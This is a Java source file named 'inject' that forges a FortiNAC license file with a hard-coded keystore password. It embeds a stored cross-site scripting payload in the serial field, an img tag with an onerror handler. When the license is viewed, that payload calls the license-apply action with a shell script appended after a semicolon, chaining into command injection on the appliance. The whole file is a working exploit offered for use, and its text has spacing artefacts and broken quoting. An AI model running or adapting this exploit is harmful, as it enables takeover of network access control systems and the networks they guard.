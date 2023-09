import com. bsc. license. LicenseDecoder ;

import com. bsc. license. FortiNACLicense ;

import com. bsc. license. FortiNACType ;

import com. bsc. util. EncodeDecode ;

import java. nio. file. Files ;

import java. nio. file. Paths ;

import java. io. IOException ;

import java. io. FileWriter ;

public class inject {

static String pack ( String s ) {

int l = s . length () ;

return String . valueOf ( String . valueOf ( l ) . length () ) + String . valueOf ( l ) + s ;

}

static String key ( FortiNACLicense l , String html ) {

return EncodeDecode . encodeString (

pack ( String . valueOf ( l . getDaysValid () * 24L * 3600L * 1000L ) ) +

pack ( String . valueOf ( l . getConcurrentClientCount ()) ) +

pack ( "java. util. ArrayList" ) + pack ( "" ) + // Plugins

pack ( l . getEth0MAC () . toString () ) +

pack ( l . getType () . getFullName () ) +

pack ( "" ) + // Vendor

pack ( "1. 8" ) + // Version

pack ( "java. util. ArrayList" ) + pack ( "" ) + // Options

pack ( l . getSystemUUID () . toString () ) +

pack ( String . valueOf ( l . getUSG ()) ) + // Not really USG, but anyways

pack ( l . getSKU () ) +

pack ( l . getModelName () ) +

pack ( "false" ) + // Expired

pack ( "1" ) + // rtrCount

pack ( l . getName () . toString () ) +

pack ( l . getSerial () . toString ( ) + html ) +

pack ( String . valueOf ( l . getGeneratedDate () . toEpochMilli ()) )

) ;

}

public static void main ( String [ ] args ) throws IOException {

String payload = new String ( Files . readAllBytes ( Paths . get ( ". " , "payload. sh" ))) ;

System . setProperty ( "javax. net. ssl. keyStorePassword" , "^8Bradford%23" ) ;

LicenseDecoder ld = new LicenseDecoder () ;

FortiNACLicense l = ld . decode ( ( new String ( Files . readAllBytes ( Paths . get ( ". " , "input. lic" )))) . replaceAll ( "(\\ r|\\ n) " , "" )) ; System . out . println ( l ) ;

FileWriter output = new FileWriter ( "output. lic" ) ;

output . write (

key (

l ,

"< img src='nowhere' onerror=" var IP = $ ( ' licenseServerCombo ' ) . value . split ( / -- /) [ 0 ] ; " +

" CommonUtils . dataRequest ( ' LicenseActions . jsp ' ,{} ,

{ action: ' ajaxApplyLicense ' , deviceProxy: IP , deviceIP: IP , thisIP: '0' + IP , newLicense: ' " +

key( l, "") + " ; " + payload + " ' }) ; "/ > "

)

) ;

output . close () ;

}